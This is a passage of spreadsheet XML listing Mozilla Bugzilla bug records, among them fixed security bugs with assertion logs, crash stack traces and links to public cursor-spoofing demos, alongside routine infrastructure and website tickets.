          <t xml:space="preserve">[adv-main25+][adv-esr1710+][adv-esr24-1+] </t>
        </is>
      </c>
      <c r="Q4321" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4321" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4321" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T4321" t="n">
        <v>1</v>
      </c>
      <c r="U4321" t="n">
        <v>0</v>
      </c>
      <c r="V4321" t="n">
        <v>63</v>
      </c>
      <c r="W4321" t="inlineStr">
        <is>
          <t>Created attachment 735515
testcase
###!!! ASSERTION: Must have the same owner document: 'HasSameOwnerDoc(NODE_FROM(aParent, aDocument))', file content/base/src/Element.cpp, line 1028
###!!! ASSERTION: aDocument must be current doc of aParent: '!aParent || aDocument == aParent-&gt;GetCurrentDoc()', file content/base/src/Element.cpp, line 1030
###!!! ASSERTION: Unexpected aDocument: 'aDocument == mDocument', file layout/base/nsPresShell.cpp, line 4025
###!!! ASSERTION: must be in the same rule tree as parent: 'r1 == r2', file layout/style/nsStyleContext.cpp, line 67
Security-sensitive in case this is related to bug 840098.</t>
        </is>
      </c>
      <c r="X4321" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4322">
      <c r="A4322" t="n">
        <v>1403647</v>
      </c>
      <c r="B4322" t="inlineStr">
        <is>
          <t>2017-09-27 10:22:25 -0700</t>
        </is>
      </c>
      <c r="C4322" t="inlineStr">
        <is>
          <t>Document Generic Ingestion How-To</t>
        </is>
      </c>
      <c r="D4322" t="inlineStr">
        <is>
          <t>2018-05-25 13:00:30 -0700</t>
        </is>
      </c>
      <c r="E4322" t="n">
        <v>1</v>
      </c>
      <c r="F4322" t="n">
        <v>1</v>
      </c>
      <c r="G4322" t="n">
        <v>2</v>
      </c>
      <c r="H4322" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4322" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J4322" t="inlineStr">
        <is>
          <t>Documentation and Knowledge Repo (RTMO)</t>
        </is>
      </c>
      <c r="K4322" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4322" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4322" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4322" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4322" t="inlineStr"/>
      <c r="Q4322" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4322" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4322" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4322" t="n">
        <v>1</v>
      </c>
      <c r="U4322" t="n">
        <v>0</v>
      </c>
      <c r="V4322" t="n">
        <v>6</v>
      </c>
      <c r="W4322" t="inlineStr">
        <is>
          <t>This should cover:
- What is the generic ingestion? When should we use it?
- What does the endpoint look like?
- How do I write a schema for a message?
- Where does the data end up, and how do I access it?</t>
        </is>
      </c>
      <c r="X4322" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4323">
      <c r="A4323" t="n">
        <v>1207958</v>
      </c>
      <c r="B4323" t="inlineStr">
        <is>
          <t>2015-09-24 00:16:18 -0700</t>
        </is>
      </c>
      <c r="C4323" t="inlineStr">
        <is>
          <t>Assertion failure: mTargetSize.width &lt;= aOriginalSize.width (Created a downscale r, but width is larger), at c:/Users/mozilla/debug-builds/mozilla-central/image/ Downscaler.cpp:68</t>
        </is>
      </c>
      <c r="D4323" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:53 -0700</t>
        </is>
      </c>
      <c r="E4323" t="n">
        <v>1</v>
      </c>
      <c r="F4323" t="n">
        <v>1</v>
      </c>
      <c r="G4323" t="n">
        <v>3</v>
      </c>
      <c r="H4323" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4323" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4323" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K4323" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4323" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4323" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4323" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4323" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main45+]</t>
        </is>
      </c>
      <c r="Q4323" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4323" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4323" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T4323" t="n">
        <v>1</v>
      </c>
      <c r="U4323" t="n">
        <v>0</v>
      </c>
      <c r="V4323" t="n">
        <v>45</v>
      </c>
      <c r="W4323" t="inlineStr">
        <is>
          <t>Created attachment 8665302
windbg information/stack
Found via bughunter and reproduced with a windows 7 debug build.
Steps to reproduce:
Load http://adkelectricinc.com/
Assertion failure: mTargetSize.width &lt;= aOriginalSize.width (Created a downscale
r, but width is larger), at c:/Users/mozilla/debug-builds/mozilla-central/image/
Downscaler.cpp:68
#01: mozilla::image::nsGIFDecoder2::BeginImageFrame (c:\users\mozilla\debug-buil
ds\mozilla-central\image\decoders\nsgifdecoder2.cpp:283)
#02: mozilla::image::nsGIFDecoder2::WriteInternal (c:\users\mozilla\debug-builds
\mozilla-central\image\decoders\nsgifdecoder2.cpp:1106)
#03: mozilla::image::Decoder::Write (c:\users\mozilla\debug-builds\mozilla-centr
al\image\decoder.cpp:186)
#04: mozilla::image::Decoder::Decode (c:\users\mozilla\debug-builds\mozilla-cent
ral\image\decoder.cpp:128)
#05: mozilla::image::DecodePool::Decode (c:\users\mozilla\debug-builds\mozilla-c
entral\image\decodepool.cpp:455)
#06: mozilla::image::DecodePoolWorker::Run (c:\users\mozilla\debug-builds\mozill
a-central\image\decodepool.cpp:292)
#07: nsThread::ProcessNextEvent (c:\users\mozilla\debug-builds\mozilla-central\x
pcom\threads\nsthread.cpp:960)
#08: NS_ProcessNextEvent (c:\users\mozilla\debug-builds\mozilla-central\xpcom\gl
ue\nsthreadutils.cpp:277)
#09: mozilla::ipc::MessagePumpForNonMainThreads::Run (c:\users\mozilla\debug-bui
lds\mozilla-central\ipc\glue\messagepump.cpp:355)
#10: MessageLoop::RunInternal (c:\users\mozilla\debug-builds\mozilla-central\ipc
\chromium\src\base\message_loop.cc:234)
#11: MessageLoop::RunHandler (c:\users\mozilla\debug-builds\mozilla-central\ipc\
chromium\src\base\message_loop.cc:228)
#12: MessageLoop::Run (c:\users\mozilla\debug-builds\mozilla-central\ipc\chromiu
m\src\base\message_loop.cc:202)
#13: nsThread::ThreadFunc (c:\users\mozilla\debug-builds\mozilla-central\xpcom\t
hreads\nsthread.cpp:384)
#14: _PR_NativeRunThread (c:\users\mozilla\debug-builds\mozilla-central\nsprpub\
pr\src\threads\combined\pruthr.c:397)
#15: pr_root (c:\users\mozilla\debug-builds\mozilla-central\nsprpub\pr\src\md\wi
ndows\w95thred.c:90)
#16: _get_flsindex[MSVCR120 +0x2c01d]
#17: _get_flsindex[MSVCR120 +0x2c001]
#18: BaseThreadInitThunk[kernel32 +0x4ee1c]
#19: RtlInitializeExceptionChain[ntdll +0x637eb]
#20: RtlInitializeExceptionChain[ntdll +0x637be]</t>
        </is>
      </c>
      <c r="X4323" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4324">
      <c r="A4324" t="n">
        <v>1737751</v>
      </c>
      <c r="B4324" t="inlineStr">
        <is>
          <t>2021-10-26 00:13:11 -0700</t>
        </is>
      </c>
      <c r="C4324" t="inlineStr">
        <is>
          <t>users with zoomed cursors vulnerable to spoofed cursors leaking into the addressbar</t>
        </is>
      </c>
      <c r="D4324" t="inlineStr">
        <is>
          <t>2022-08-26 23:22:42 -0700</t>
        </is>
      </c>
      <c r="E4324" t="n">
        <v>1</v>
      </c>
      <c r="F4324" t="n">
        <v>1</v>
      </c>
      <c r="G4324" t="n">
        <v>3</v>
      </c>
      <c r="H4324" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4324" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4324" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4324" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4324" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4324" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4324" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4324" t="inlineStr">
        <is>
          <t>[adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q4324" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4324" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4324" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T4324" t="n">
        <v>1</v>
      </c>
      <c r="U4324" t="n">
        <v>0</v>
      </c>
      <c r="V4324" t="n">
        <v>13</v>
      </c>
      <c r="W4324" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1670316 +++
The defense against large spoofed cursors leaking into the browser chrome does not take into account that users may have increased the size of their OS cursor for accessibility reasons.  See bug 1670316 comment 30 and following.
On Mac you can do this by searching for "cursor size" in system preferences and making the cursor larger than normal. You may need to restart Firefox to see the spoof.  Then try any of the testcases previously used for this issue. If we can detect that the OS is scaling the cursor larger, we should adjust the point at which we kill a custom cursor accordingly.
POCs:
* https://jameshfisher.github.io/cursory-hack/
* https://benjaminbenben.com/cursory-hack/
I'm lowering the security severity of this since it won't apply by default for most users.</t>
        </is>
      </c>
      <c r="X4324" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4325">
      <c r="A4325" t="n">
        <v>1330324</v>
      </c>
      <c r="B4325" t="inlineStr">
        <is>
          <t>2017-01-11 07:28:11 -0800</t>
        </is>
      </c>
      <c r="C4325" t="inlineStr">
        <is>
          <t>Switch the MySQL transaction isolation level from REPEATABLE-READ to READ-COMMITTED</t>
        </is>
      </c>
      <c r="D4325" t="inlineStr">
        <is>
          <t>2017-02-16 09:15:22 -0800</t>
        </is>
      </c>
      <c r="E4325" t="n">
        <v>1</v>
      </c>
      <c r="F4325" t="n">
        <v>1</v>
      </c>
      <c r="G4325" t="n">
        <v>7</v>
      </c>
      <c r="H4325" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4325" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4325" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4325" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4325" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4325" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4325" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4325" t="inlineStr"/>
      <c r="Q4325" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4325" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4325" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4325" t="n">
        <v>1</v>
      </c>
      <c r="U4325" t="n">
        <v>0</v>
      </c>
      <c r="V4325" t="n">
        <v>10</v>
      </c>
      <c r="W4325" t="inlineStr">
        <is>
          <t>There's a discussion on the Django mailing list about overriding the MySQL default transaction level in future versions of Django:
https://groups.google.com/forum/#!topic/django-developers/JiXalqmohUc
It turns out that the Django `get_or_create()` docs already recommend using READ-COMMITTED rather than the MySQL default of REPEATABLE-READ:
"""
If you are using MySQL, be sure to use the READ COMMITTED isolation level rather than REPEATABLE READ (the default), otherwise you may see cases where get_or_create will raise an IntegrityError but the object won’t appear in a subsequent get() call.
"""
(From: https://docs.djangoproject.com/en/1.10/ref/models/querysets/#get-or-create)
Perhaps this explains some of the random issues we've seen? (both in general, plus when running schema migrations without stopping ingestion)
MySQL docs on the transaction levels:
https://dev.mysql.com/doc/refman/5.6/en/innodb-transaction-isolation-levels.html
Django tickets/discussions that give more context:
https://code.djangoproject.com/ticket/27683
https://code.djangoproject.com/ticket/26347
https://code.djangoproject.com/ticket/21670
https://code.djangoproject.com/ticket/13906
https://groups.google.com/forum/#!msg/django-developers/6pWbpV1_6Us/a3CNmojACwAJ
https://opbeat.com/community/posts/lightning-talks-day-1/ (jump to 4 mins 20s in)
If we wanted to change the transaction level, we could either do so via the Django DATABASES config `OPTIONS` key, or else by using the system variable `tx_isolation`:
https://dev.mysql.com/doc/refman/5.6/en/server-system-variables.html#sysvar_tx_isolation</t>
        </is>
      </c>
      <c r="X4325" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4326">
      <c r="A4326" t="n">
        <v>660623</v>
      </c>
      <c r="B4326" t="inlineStr">
        <is>
          <t>2011-05-30 05:50:48 -0700</t>
        </is>
      </c>
      <c r="C4326" t="inlineStr">
        <is>
          <t>[Join us] layout issues with the "Choose Your Destiny" section</t>
        </is>
      </c>
      <c r="D4326" t="inlineStr">
        <is>
          <t>2011-06-02 07:28:19 -0700</t>
        </is>
      </c>
      <c r="E4326" t="n">
        <v>1</v>
      </c>
      <c r="F4326" t="n">
        <v>1</v>
      </c>
      <c r="G4326" t="n">
        <v>5</v>
      </c>
      <c r="H4326" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4326" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J4326" t="inlineStr">
        <is>
          <t>donate.mozilla.org</t>
        </is>
      </c>
      <c r="K4326" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4326" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4326" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4326" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4326" t="inlineStr"/>
      <c r="Q4326" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4326" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4326" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4326" t="n">
        <v>1</v>
      </c>
      <c r="U4326" t="n">
        <v>0</v>
      </c>
      <c r="V4326" t="n">
        <v>7</v>
      </c>
      <c r="W4326" t="inlineStr">
        <is>
          <t>Created attachment 536068
screenshot
the layout of the "Choose Your Destiny" section is wrong (testing in aurora, chrome and ie9).  see attached.</t>
        </is>
      </c>
      <c r="X4326" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4327">
      <c r="A4327" t="n">
        <v>509636</v>
      </c>
      <c r="B4327" t="inlineStr">
        <is>
          <t>2009-08-10 19:16:44 -0700</t>
        </is>
      </c>
      <c r="C4327" t="inlineStr">
        <is>
          <t>"Assertion failure: pn-&gt;pn_type != TOK_COMMA, at ../jsemit.cpp"</t>
        </is>
      </c>
      <c r="D4327" t="inlineStr">
        <is>
          <t>2009-09-30 14:47:05 -0700</t>
        </is>
      </c>
      <c r="E4327" t="n">
        <v>1</v>
      </c>
      <c r="F4327" t="n">
        <v>1</v>
      </c>
      <c r="G4327" t="n">
        <v>3</v>
      </c>
      <c r="H4327" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4327" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4327" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4327" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4327" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4327" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4327" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4327" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4327" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4327" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4327" t="n">
        <v>1</v>
      </c>
      <c r="U4327" t="n">
        <v>0</v>
      </c>
      <c r="V4327" t="n">
        <v>7</v>
      </c>
      <c r="W4327" t="inlineStr">
        <is>
          <t>[]=[(0,0)]
asserts js dbg shell on TM branch (31079:3d4074b8928e) without -j at Assertion failure: pn-&gt;pn_type != TOK_COMMA, at ../jsemit.cpp:3855 when parsed in as a file.
$ cat a.js
[]=[(0,0)]
$ ./js-dbg-tm-darwin a.js 
Assertion failure: pn-&gt;pn_type != TOK_COMMA, at ../jsemit.cpp:3855
Trace/BPT trap
autoBisecting soon...</t>
        </is>
      </c>
      <c r="X4327" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4328">
      <c r="A4328" t="n">
        <v>1243434</v>
      </c>
      <c r="B4328" t="inlineStr">
        <is>
          <t>2016-01-27 09:24:00 -0800</t>
        </is>
      </c>
      <c r="C4328" t="inlineStr">
        <is>
          <t>Update MDN about Marketplace changes</t>
        </is>
      </c>
      <c r="D4328" t="inlineStr">
        <is>
          <t>2016-04-01 08:17:17 -0700</t>
        </is>
      </c>
      <c r="E4328" t="n">
        <v>1</v>
      </c>
      <c r="F4328" t="n">
        <v>1</v>
      </c>
      <c r="G4328" t="n">
        <v>6</v>
      </c>
      <c r="H4328" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4328" t="inlineStr">
        <is>
          <t>Developer Documentation Graveyard</t>
        </is>
      </c>
      <c r="J4328" t="inlineStr">
        <is>
          <t>Marketplace</t>
        </is>
      </c>
      <c r="K4328" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4328" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4328" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4328" t="inlineStr"/>
      <c r="Q4328" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4328" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4328" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4328" t="n">
        <v>1</v>
      </c>
      <c r="U4328" t="n">
        <v>0</v>
      </c>
      <c r="V4328" t="n">
        <v>28</v>
      </c>
      <c r="W4328" t="inlineStr">
        <is>
          <t>Update MDN regarding Payments, WebRT, Submission of apps for desktop, android, tablet.</t>
        </is>
      </c>
      <c r="X4328" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4329">
      <c r="A4329" t="n">
        <v>601102</v>
      </c>
      <c r="B4329" t="inlineStr">
        <is>
          <t>2010-10-01 05:11:17 -0700</t>
        </is>
      </c>
      <c r="C4329" t="inlineStr">
        <is>
          <t>Crash in exn_trace [@ js::Shape::trace(JSTracer*) ][@ js::Shape::trace ] mainly with TestPilot 1.1 and below</t>
        </is>
      </c>
      <c r="D4329" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:51 -0700</t>
        </is>
      </c>
      <c r="E4329" t="n">
        <v>1</v>
      </c>
      <c r="F4329" t="n">
        <v>1</v>
      </c>
      <c r="G4329" t="n">
        <v>3</v>
      </c>
      <c r="H4329" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4329" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4329" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4329" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4329" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4329" t="inlineStr">
        <is>
          <t>[sg:critical?][fx4-rc-ridealong]</t>
        </is>
      </c>
      <c r="Q4329" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4329" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4329" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4329" t="n">
        <v>1</v>
      </c>
      <c r="U4329" t="n">
        <v>0</v>
      </c>
      <c r="V4329" t="n">
        <v>36</v>
      </c>
      <c r="W4329" t="inlineStr">
        <is>
          <t>Build : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7pre) Gecko/20100930 Firefox/4.0b7pre
This is a new crash signature that was introduced by b7pre/20100929 build.
It happens only under Windows XP.
It is #20 top crasher for b7pre/20100930 build.
Signature	js::Shape::trace(JSTracer*)
UUID	61d6d1b5-c6bf-4cff-be12-4c65d2100930
Time 	2010-09-30 22:43:46.779302
Uptime	30
Last Crash	36 seconds before submission
Install Age	52464 seconds (14.6 hours) since version was first installed.
Product	Firefox
Version	4.0b7pre
Build ID	20100930041305
Branch	2.0
OS	Windows NT
OS Version	5.1.2600 Service Pack 2
CPU	x86
CPU Info	GenuineIntel family 15 model 6 stepping 4
Crash Reason	EXCEPTION_ACCESS_VIOLATION_WRITE
Crash Address	0x1e
App Notes 	AdapterVendorID: 8086, AdapterDeviceID: 29c2
Frame 	Module 	Signature [Expand] 	Source
0 	mozjs.dll 	js::Shape::trace 	js/src/jsscope.cpp:1358
1 	mozjs.dll 	fun_trace 	js/src/jsfun.cpp:2075
2 	mozjs.dll 	js_TraceObject 	js/src/jsobj.cpp:6168
3 	mozjs.dll 	js::gc::MarkChildren 	js/src/jsgcinlines.h:199
4 	mozjs.dll 	js::gc::MarkObject 	js/src/jsgcinlines.h:179
5 	mozjs.dll 	fun_trace 	js/src/jsfun.cpp:2060
6 	mozjs.dll 	js_TraceObject 	js/src/jsobj.cpp:6168
The regression range is :
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=c257bfb8cad0&amp;tochange=a60414d076b5
More reports at :
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;range_value=4&amp;range_unit=weeks&amp;hang_type=any&amp;process_type=any&amp;plugin_field=&amp;plugin_query_type=&amp;plugin_query=&amp;do_query=1&amp;admin=&amp;signature=js%3A%3AShape%3A%3Atrace%28JSTracer*%29</t>
        </is>
      </c>
      <c r="X4329" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4330">
      <c r="A4330" t="n">
        <v>1427144</v>
      </c>
      <c r="B4330" t="inlineStr">
        <is>
          <t>2017-12-26 18:19:30 -0800</t>
        </is>
      </c>
      <c r="C4330" t="inlineStr">
        <is>
          <t>drop all crash reports from the dockerized-environment</t>
        </is>
      </c>
      <c r="D4330" t="inlineStr">
        <is>
          <t>2017-12-28 13:11:56 -0800</t>
        </is>
      </c>
      <c r="E4330" t="n">
        <v>1</v>
      </c>
      <c r="F4330" t="n">
        <v>1</v>
      </c>
      <c r="G4330" t="n">
        <v>4</v>
      </c>
      <c r="H4330" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4330" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4330" t="inlineStr">
        <is>
          <t>Data request</t>
        </is>
      </c>
      <c r="K4330" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4330" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4330" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4330" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4330" t="inlineStr"/>
      <c r="Q4330" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4330" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4330" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4330" t="n">
        <v>1</v>
      </c>
      <c r="U4330" t="n">
        <v>0</v>
      </c>
      <c r="V4330" t="n">
        <v>3</v>
      </c>
      <c r="W4330" t="inlineStr">
        <is>
          <t>Per bug 1427117, we need to delete all crash reports collected before 2017-12-24. This bug covers removing the subset of information we copied into the partially complete dockerized environment for testing. This means postgres, s3, e-s. May as well empty the environment completely.
stage first, then prod.</t>
        </is>
      </c>
      <c r="X4330" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4331">
      <c r="A4331" t="n">
        <v>527552</v>
      </c>
      <c r="B4331" t="inlineStr">
        <is>
          <t>2009-11-09 14:28:15 -0800</t>
        </is>
      </c>
      <c r="C4331" t="inlineStr">
        <is>
          <t>left-side menu for getting started, FAQ, and tutorial</t>
        </is>
      </c>
      <c r="D4331" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E4331" t="n">
        <v>1</v>
      </c>
      <c r="F4331" t="n">
        <v>1</v>
      </c>
      <c r="G4331" t="n">
        <v>6</v>
      </c>
      <c r="H4331" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4331" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J4331" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K4331" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4331" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4331" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4331" t="inlineStr"/>
      <c r="Q4331" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4331" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4331" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T4331" t="n">
        <v>1</v>
      </c>
      <c r="U4331" t="n">
        <v>0</v>
      </c>
      <c r="V4331" t="n">
        <v>18</v>
      </c>
      <c r="W4331" t="inlineStr">
        <is>
          <t>Created attachment 411284
left-side menu
For Getting Started, FAQ, and Tutorial Pages, please include a left side menu. See attached.</t>
        </is>
      </c>
      <c r="X4331" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4332">
      <c r="A4332" t="n">
        <v>1200856</v>
      </c>
      <c r="B4332" t="inlineStr">
        <is>
          <t>2015-09-01 15:56:08 -0700</t>
        </is>
      </c>
      <c r="C4332" t="inlineStr">
        <is>
          <t>CORS preflight cache poisoning with the credentials flag</t>
        </is>
      </c>
      <c r="D4332" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4332" t="n">
        <v>1</v>
      </c>
      <c r="F4332" t="n">
        <v>1</v>
      </c>
      <c r="G4332" t="n">
        <v>3</v>
      </c>
      <c r="H4332" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4332" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4332" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4332" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4332" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4332" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4332" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4332" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q4332" t="inlineStr">
        <is>
          <t>--</t>
